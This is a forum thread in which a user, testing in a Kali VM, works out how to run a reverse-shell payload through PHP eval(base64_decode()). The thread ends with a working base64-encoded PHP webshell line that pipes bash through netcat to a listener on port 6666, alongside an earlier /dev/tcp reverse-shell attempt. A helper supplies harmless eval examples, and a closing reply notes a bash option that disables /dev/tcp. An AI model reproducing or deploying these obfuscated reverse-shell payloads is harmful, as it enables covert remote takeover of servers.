Using eval(base64_decode(''));

I’m trying to figure out how to execute a php file using the following code written in the file:


Where the contents within quotes is a base64 encoded string. That string contains the payload:

<?php system('/bin/bash -i >& /dev/tcp/ 0>&1'); ?>

I’m testing this in my kali VM using the following commands:

php -f test.php

The former simply echos the explicit contents to terminal; “eval(base64_decode…”

The latter shows the errors:
./test.php line 1: syntax error near the unexpected token `base64_decode’

./test.php line 1: `eval(“base64-encoded-payload”));’

I’ve got a netcat listener setup on port 6666. Nothing happens. Can anyone point me in the right direction with this?

Some PHP script examples to show the execution of PHP script with eval function and bash script with system function:

$ cat script-A.php 
 echo date("o-m-d"), ": this is php script code running\n";

$ php script-A.php 
2022-10-07: this is php script code running

$ cat script-B.php 
 echo "php starts bash\n";
 eval( "system(\"echo \$(date -I) : running bash script in eval function\");" );

$ php script-B.php 
php starts bash
2022-10-07 : running bash script in eval function

$ cat script-C.php 
 echo "php evaluates: ", base64_decode($code), "\n";
 eval( base64_decode($code) );

$ php script-C.php 
php evaluates: system("echo $(date -I) : running bash script in eval function");
2022-10-07 : running bash script in eval function

The string in the eval function is php code to evaluate. The string contains no <php and ?> around the PHP code.

1 Like

Hey I appreciate very much the examples you provided. It turns out I was using double php tags because of the ones in the payload itself; as your last comment suggested. Thank you.

The final result looks like:

echo “system(‘rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 6666 > /tmp/f’);” | base64 -w 0

I then copied the base64 string into a file as such:

<?php eval( base64_decode("c3lzdGVtKCdybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL2Jhc2ggLWkgIDI+JjEgfCBuYyAxMC4wLjAuNSA2NjY2ID4gL3RtcC9mJyk7Cg==") ); ?>

The former shell using /dev/tcp didn’t work either, though. The piped version does.

/dev/tcp/host/port and also /dev/udp/host/port are interpreted by the bash shell. There exists no /dev/tcp in the virtual Unix file system.

The bash can be harden with the option ‘disable-net-redirections’. Such as bash does not interpret the /dev/tcp/... and /dev/udp/... special file names.

See: Installing Bash: Optional Features

Debian used this configuration up to version 4. Debian bash changelog 5.0

1 Like